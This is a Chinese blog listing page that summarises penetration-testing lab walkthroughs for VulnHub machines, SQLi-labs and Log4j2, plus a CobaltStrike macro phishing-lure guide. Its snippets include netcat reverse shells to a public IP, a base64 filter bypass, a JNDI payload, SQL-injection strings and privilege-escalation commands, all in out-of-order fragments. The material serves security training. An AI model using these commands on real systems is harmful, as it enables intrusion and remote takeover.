- 博客(54)
- 收藏
- 关注
原创 Looz靶机通关教程
1.上面我们发现了账号密码,接下来我们就尝试寻找一下后台然后尝试登录。信息收集时候我们发现还有一个8081端口,我们尝试去访问一下,发现自动跳转到80端口了。4.将收集到的信息整理、分析,我们在80端口的首页源代码里面发现了一个账号密码,而这里的wp指的是wordpress.3.看到开启了80端口,那我们接着扫描一下敏感目录看一下,输入:dirsearch -u http://靶机ip。3.尝试访问一下,看到访问不到,这是因为我们的浏览器无法解析这个地址。2.我们运行一下,运行完发现就是root权限了。
2025-08-15 15:04:30
418
原创 CobaltStrike钓鱼鱼饵制作教程
4.在靶机上面新建一贯office的word文档,然后保证我们的宏可以被执行,依次点击:文件----->选项----->信任中心------->信任中心设置,点击启用。2.监听建立完成后来到:有效载荷--->office宏,然后选择我们新建的监听。2.我们到cs来到攻击--->web投递,制作一个攻击语句。5.然后打开我们之前下载好的工具,打开然后我们如图操作。3.然后在我们的靶机上新建一个快捷方式,然后如图操作。1.来到cs的攻击------>web投递,然后。5.然后来到:视图----->宏。
2025-08-11 21:06:29
494
原创 CobaltStrike安装和使用教程
4.接下来就是启动我们的客户端,输入:cd CS4.7key-mht进入cs的文件夹。然后输入:./start.sh启动我们的客户端。3.解压完成后我们输入命令:cd CS4.7key-mht 来到解压好的文件,然后输入:chmod +x ./*。1.首先我们需要将我们下载下来的压缩包上传到我们的云服务器(没有云服务器的本机也可),这一步主要是云服务器有公网地址可以访问公网的机器。4.然后测试服务端,输入:./teamserver启动我们的服务端测试,如果回显无报错那就代表可以正常运行。
2025-08-11 19:09:04
1778
原创 Beelzebub靶机通关教程
输入命令:wpscan --url=http://192.168.149.131/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive扫描出来两个用户。(4)然后我们扫描一下敏感目录,输入:dirsearch -u http://192.168.149.131,看到成功扫描到这些目录。(1)打开kali然后输入:arp-scan -l 扫描靶机ip。
2025-08-09 16:34:59
443
原创 Drippingblues靶机通关教程
(8)输入:fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip。(5)之前扫描端口的时候还有一个ftp21的端口,我们尝试一下看看能不能登录,发现没有密码直接就登录进来了。然后我们筛选后发现了一个提示,大致意思叫我们把一个网站里的歌词排列气起来然后md5解密,感觉有点扯,我们只能再寻找其他线索。(1)我们在提示里面发现,有一个提示,我们猜测可能存在dirp参数。(2)我们尝试一下dirp,发现成功了,说明存在文件包含。
2025-08-08 19:18:45
426
原创 Doubletrouble靶机通关教程
(6)然后开始爆破,输入:stegseek --crack doubletrouble.jpg /root/dict/rockyou.txt -xf output.txt。(4)然后输入:gunzip /usr/share/wordlists/rockyou.txt.gz,解压一下kali自带的字典。(2)输入:sudo awk 'BEGIN {system("/bin/bash -p")}',可以发现成功提权!(7)尝试用得到的信息登录,成功登录!(2)将文件上传访问,就可以反弹shell了。
2025-08-08 17:45:59
520
原创 SQLI-labs靶场第41~65关通关教程
id=1') and if(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1)='s',sleep(100000),1)--+打开拦截抓包就然后爆破。7.然后查看具体数据:and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),3)
2025-08-06 07:42:58
1027
原创 常见的中间件漏洞练习教程
2.接下来我们打开kali,然后在工具包里面的打开终端然后输入:python2 duqu.py -p 8009 -f /WEB-INF/web.xml 47.105.65.103。5.接着执行:curl http://47.105.65.103:8080//invoker/JMXInvokerServlet --data-binary @exp.ser。http://121.40.229.129:8080/jbossmq-httpil/HTTPServerILServlet代表有漏洞。
2025-07-31 21:37:06
1953
原创 Icai1靶机通关教程
2.然后尝试连接数据库,输入:mysql -h 192.168.192.133 -P 3306 --user=qdpmadmin --password=UcVQCMQk2STVeS6J --ssl-verify-server-cert=0。4.然后查看敏感目录,输入命令:dirsearch -u 靶机IP 然后就可以看到一些命令,查看一番后发现没有什么有用的东西。1.打开kali输入命令:arp-scan -l查看同一网段内的机器,可以看到成功扫到一台机器。1.可以看到这里框架是qdpm9.2。
2025-07-31 07:08:38
332
原创 常见CMS获取webshell的方法-靶场练习
上传文件成功后可以看到文件地址,我们去访问一下。5.然后我们去访问这个404.php文件,文件位置为:/wp-content/themes/自己模板的名称/404.php。4.上传成功后会给你一个地址,我们去访问一下这个文件夹下的木马文件,并尝试执行命令可以看到成功执行。2.然后我们解压压缩包,并在文件里面写入一个1.php的木马文件,木马内容为:<?那我们就可以直接修改幻灯片的配置。2.然后我们尝试去访问这个文件,并执行命令可以看到成功执行。6.去浏览器访问这个文件,然后去执行命令可以看到成功执行。
2025-07-30 19:15:25
1586
原创 Napping靶机通关教程
3.然乎将制作好的两个文件放在kali里面然后,监听端口:nc -lvvp 6688,然后提交http://192.168.192.128/1.html地址进行提交,监听到用户和密码了就可以获得账户和密码了。1.打开kali 使用命令:arp-scan -l扫描同一网段下的机器(kali是nat模式)成功扫描到机器。2.使用nmap扫描存在的端口和服务,看到存在80 和22端口。4.扫描一下存在的目录,可以看到存在以下目录。2.然后我们尝试登录,登录成功后可以看到。1.我们尝试去注册一个用户。
2025-07-30 07:35:05
257
原创 Breakout靶机通关教程
1.然后我启动靶机并打开我们的kali,然后使用命令:arp-scan -l扫描同一网段内的其他机器。5.整理后发现没有什么可以有用的信息,然后我们在80端口首页的源代码里面可以看到一个信息。1.我们使用命令:enum4linux 靶机ip,可以看到成功扫描到一个用户cyber。2.然后我们查看一下有哪些文件文件,然后我们在/var的文件夹下找到了一个文件。4.然后我们查看文件,有一个user.txt里面就有一个flag。3.我们尝试去解压一下这个文件,可以获得一个密码。2.然后我们在靶机上执行命令。
2025-07-29 21:40:57
376
原创 cmseasy靶机密码爆破通关教程
本文介绍了CmsEasy_7.6.3.2靶场的安装与爆破教程。安装步骤包括:下载解压到phpstudy_pro网站目录,访问网站进行安装并配置数据库连接。爆破教程演示了如何利用cookie验证机制漏洞:先随便输入账号密码,用BurpSuite拦截请求,删除cookie后设置变量并加载密码字典进行爆破,通过响应包长度(832)判断正确密码。该教程展示了基于cookie验证的Web应用安全测试方法。
2025-07-29 19:36:32
276
原创 SQLI-labs靶场第22~40关通关教程
2.我们使用报错注入可以大大的减少空格的使用,所以这里就使用报错注入,我们输入:/?4.接着查看数据库中的表,输入:?
2025-07-29 07:52:40
802
原创 常见的未授权访问漏洞靶场-练习教程
我们输入:rsync ./phpinfo.php rsync://目标靶机ip/src/home。命令:进入靶场目录:cd /etc/vulhub-master/redis/4-unacc 启动靶场:docker-compose up -d。10.上传shell到靶机,输入:rsync -av /tmp/tmp/shell rsync://靶机ip/src/etc/cr。rsync rsync://靶机ip/src/etc/crontab /tmp/tmp/crontab.txt。
2025-07-28 21:40:54
876
原创 Redis未授权访问的利用的几种方法原理以及条件
1.原理:在Redis 4.x之后,Redis新增了模块功能,通过外部拓展,可以在redis中实现一个新的Redis命令,通过写c语言并编译出.so文件。通过在本地虚拟一个redis数据库,然后将靶机的数据库设置成本地数据库的从数据库,来将恶意.so文件散布到靶机上。1.原理:Redis默认无密码且暴露在公网时,攻击者可直接连接它,并利用其数据备份功能将恶意代码伪装成普通数据,再通过修改配置让Redis把这些数据“误保存”为网站目录下的可执行文件(如。当用户访问这个文件时,木马就会被触发。
2025-07-28 21:39:31
631
原创 Jangow靶机通关教程
1.首先我们打开我们的kali,然后我们输入:arp-scan -l查看该net网段下的所有机器。2.接着我们扫描该ip下的开放的端口,输入:nmap -T4 -A -v ip。4.然后我们在wordpress目录里面找到另外一个数据库的名字和密码。3.目录扫描,我们去扫描一下该IP下的敏感目录可以看到扫描到两个目录。3.然后我们开启虚拟机后就可以看到这个界面就可以了。2.然后我们尝试一下执行我们的命令,看到命令成功执行。1.首先我们需要下载一下我们的jangow靶机。3.然后我们用蚁剑链接一下这个木马。
2025-07-27 10:27:12
467
原创 大米cms业务逻辑漏洞练习
2.然后我们开始去尝试寻找一下漏洞,我们在产品展示中发现购买商品的数量可以为负数。6.支付成功了,我们查看一下余额,看到我们的余额从0变为:6000了。5.支付成功后我们查看一下我们账户的余额(选择站内支付)4.注册登录成功后,我们尝试去支付一下看到金额为负数。3.我们先去注册一个账户,尝试去支付一下。7.说明这个存在业务逻辑漏洞。
2025-07-26 17:40:56
279
原创 Cmseasy业务逻辑漏洞练习
1.我们首先下载好我们的cmseasy的压缩包,然后解压放到我们phpstudy的www目录下。2.我们点击支付尝试一下,可以看到我们不仅不需要支付钱,反而商家会给我们返回钱。2.然后我们去访问一下这个网址,这里需要注册登录一下然后就可以了。3.我们支付后看一下是否有变化,看到余额从零变为1016820。1.我们尝试去购买商品,然后可以发现商品的数量为负数。4.这就是业务逻辑漏洞!
2025-07-26 17:24:39
141
原创 Earth靶机通关教程
2.然后在命令框里输入:nc -c sh 47.105.65.103 8090后发现没有执行,那我们就尝试用base64编码绕过一下,我们首先将:nc 47.105.65.103 8090 -e /bin/bash进行base64编码一下,然后填入:echo "填入处" | base64 -d |bash 然后输入。5.然后我们修改完之后dns解析记录后我们重新访问earth.local,尝试后发现这是一个信息发送页面,发送的消息会被加密记录在下面,但是我们不清楚具体加密方式。
2025-07-26 11:58:11
911
原创 matrix-breakout-2-morpheus靶机通关教程
4.接下来扫描敏感目录,我们直接扫描80端口就可以,25是SMTP服务、22是远程连接、81是一个自定义的登录界面、110是pop3邮件传输协议的端口。2.我们抓包后分析一下,我们可以看到post传参时后发现不止只传参我们的111,同时还传参了一个graffiti.txt。3.我们使用扫描工具去扫描这个c端,查看我们靶机的IP以及其开放的端口,打开御剑扫描工具进行扫描。3.然后我们去访问这个文件,并且去利用我们的木马去执行一个命令,可以看到执行成功了说明木马生效。4.我们用蚂剑来连接一下,成功连接。
2025-07-24 19:16:11
414
原创 Log4j2漏洞vul-hub通关教程
4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。action=${jndi:填充}2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,
2025-07-23 19:44:37
581
原创 IIS文件解析漏洞
1.首先创建一个文件内容为<?(在中间件为iis7的网站更目录下)3.我们往网站末尾加上/.php中间件就会把他当php文件处理,因为php文件被解析了所以没有显示。1. php.ini⾥的cgi.fix_pathinfo=1 开启。在iis7中⼀个文件路径/xx.jpg 后⾯加上/xx.php会将。2.然后我们去网站访问他,因为没有图像所以访问到是这样。/xx.jpg/xx.php 解析为 php ⽂件。4.我们尝试执行命令,可以看到执行成功。
2025-07-22 22:23:56
280
原创 Apache-文件解析漏洞
1.首先准备一个shell.php.jpg文件内容为:<?2.然后上传我们准备好的shell.php文件,并且打开burpsuite抓包在文件后面加空格。4.我们访问后查看到php文件,命令成功被执行。生成了一个shell.php的木马文件。5.然后去访问shell.php,访问后执行命令就可以看到命令成功执行。3.然后修改hex里面的0a然后就可以上传文件成功了。2.然后启动靶场环境去访问靶场页面,然后上传文件。
2025-07-22 22:00:39
374
原创 Vulhub-Nginx文件解析漏洞通关教程
5.来到首页后上传我们准备好的shell.php,然后打开Burpsuite打开拦截并点击发送抓包。3.然后将我们第一关的shell.php修改为shell.jpg上传我们,可以看到上传成功并且给了我们文件地址。6.文件上传成功后修改url后面的文件后缀在jpg后面加上空格空格.php回车访问,打开拦截抓包。可以看到命令可以执行了。5.然后我们在url后面加上.php中间件就会将我们的jpg文件当作php文件执行。2.接着我们我们来到我们的靶场,首先cd到我们。6.然后直接去尝试执行我们的命令,成功执行。
2025-07-22 19:42:22
427
原创 Tomato靶机通关教程
2.不过在此之前我们还得看看我们是否有ssh日志文件的权限,ubantu的ssh日志文件一般默认保存在/var/log/auth.log下。我们输入:file:///var/log/auth.log就可以看到成功读取到了他的日志文件。扫描到常用端口后我们还需要扫描一遍全端口避免遗漏,可以看到除了上面三个常用端口外还三个不常用的端口,110是pop3邮件传输,后面两个是自定意的。1.首先我们需要准备好我们的靶场文件然后直接将这个文件托入vmware虚拟机里面就可以了。就可以看到扫描出三个敏感目录。
2025-07-21 20:25:20
433
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅